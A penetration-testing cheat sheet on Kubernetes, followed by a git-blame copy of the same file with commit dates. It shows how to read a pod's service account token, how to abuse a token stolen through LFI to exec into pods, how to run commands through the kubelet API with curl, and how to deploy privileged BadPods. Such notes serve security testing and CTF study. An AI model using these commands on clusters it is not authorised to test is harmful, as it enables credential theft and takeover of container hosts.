killchain-compendium/enumeration/docs/kubectl.md

# Kubectl

* Get pods, `-A` for all namespaces
```sh
kubectl get pods -A 
```
* Check mounted secret
```sh
kubectl auth can-i --list
kubectl get secrets
kubectl get nodes
kubectl get deployments
kubectl get services
kubectl get ingress
kubectl get jobs
```
* Intel about a secret, and output
```sh
kubectl describe secrets <secret> 
kubectl get secret <secret> -o json
kubectl describe secrets <secret> -o 'json'
```
## Abuse Token
* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token` 
* By change of an LFI extract the token and 
```sh
kubectl auth can-i --list --token=$TOKEN
kubectl get pods  --token=$TOKEN
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh
```

* __Do not copy the token around, it will end in a carfuffle of some truncated string most of the time. Just do it in the following way and spare the pain for another day__
```
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
```

### Elevate Permissions with found token

* If a token has been found but its permissions on other containers can not be used through kubectl directly, use curl
```sh
curl  -k -H "Authorization: Bearer $TOKEN" --data "cmd=id" https://$K8_IP:10250/run/$NAMESPACE/$POD/$CONTAINER
``` 
    * Find namespace and pods
```sh
kubectl get pods -A
```
    * Find name of container inside the pod description under `ContainerStatuses/name`
```sh
kubectl get pod $POD -n $NAMESPACE -o yaml
```

* Interesting find in any high priv container are 
```sh
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/ca.crt
```

* Enumerate again with the new found token
```sh
kubectl auth can-i --list
```

## Create Pods

* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)
* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
```sh
kubectl apply -f pod.yml --token=$TOKEN
```
* Start Pod
```sh
kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash
```

## Start Pods

```sh
kubectl exec -it  <podname> -n <namespace> -- /bin/bash
```
bump 2022-02-23 23:55:12 +01:00			`# Kubectl`

binary stuff 2022-05-10 00:08:57 +02:00			* Get pods, `-A` for all namespaces
bump 2022-02-23 23:55:12 +01:00			```sh
binary stuff 2022-05-10 00:08:57 +02:00			`kubectl get pods -A`
bump 2022-02-23 23:55:12 +01:00			```
			`* Check mounted secret`
			```sh
			`kubectl auth can-i --list`
			`kubectl get secrets`
			`kubectl get nodes`
			`kubectl get deployments`
			`kubectl get services`
			`kubectl get ingress`
			`kubectl get jobs`
			```
			`* Intel about a secret, and output`
			```sh
			`kubectl describe secrets <secret>`
binary stuff 2022-05-10 00:08:57 +02:00			`kubectl get secret <secret> -o json`
bump 2022-02-23 23:55:12 +01:00			`kubectl describe secrets <secret> -o 'json'`
			```
			`## Abuse Token`
added enumeration with elevate token 2022-09-06 22:02:37 +02:00			* Inside a pod the service token(jwt) can be found under `/var/run/secrets/kubernetes.io/serviceaccount/token`
bump 2022-02-23 23:55:12 +01:00			`* By change of an LFI extract the token and`
			```sh
			`kubectl auth can-i --list --token=$TOKEN`
			`kubectl get pods --token=$TOKEN`
			`kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh`
			```

added enumeration with elevate token 2022-09-06 22:02:37 +02:00			`* __Do not copy the token around, it will end in a carfuffle of some truncated string most of the time. Just do it in the following way and spare the pain for another day__`
			```
			`TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)`
			```

			`### Elevate Permissions with found token`

			`* If a token has been found but its permissions on other containers can not be used through kubectl directly, use curl`
			```sh
			`curl -k -H "Authorization: Bearer $TOKEN" --data "cmd=id" https://$K8_IP:10250/run/$NAMESPACE/$POD/$CONTAINER`
			```
			`* Find namespace and pods`
			```sh
			`kubectl get pods -A`
			```
			* Find name of container inside the pod description under `ContainerStatuses/name`
			```sh
			`kubectl get pod $POD -n $NAMESPACE -o yaml`
			```

			`* Interesting find in any high priv container are`
			```sh
			`/run/secrets/kubernetes.io/serviceaccount/token`
			`/run/secrets/kubernetes.io/serviceaccount/ca.crt`
			```

			`* Enumerate again with the new found token`
			```sh
			`kubectl auth can-i --list`
			```

bump 2022-02-23 23:55:12 +01:00			`## Create Pods`

			`* Use [BishopFox's BadPods](https://github.com/BishopFox/badPods.git)`
			* If there is no internet connection add `imagePullPolicy: IfNotPresent` to the YAML file
			```sh
			`kubectl apply -f pod.yml --token=$TOKEN`
binary stuff 2022-05-10 00:08:57 +02:00			```
			`* Start Pod`
			```sh
bump 2022-02-23 23:55:12 +01:00			`kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash`
			```
binary stuff 2022-05-10 00:08:57 +02:00
			`## Start Pods`

			```sh
			`kubectl exec -it <podname> -n <namespace> -- /bin/bash`
			```
added enumeration with elevate token 2022-09-06 22:02:37 +02:00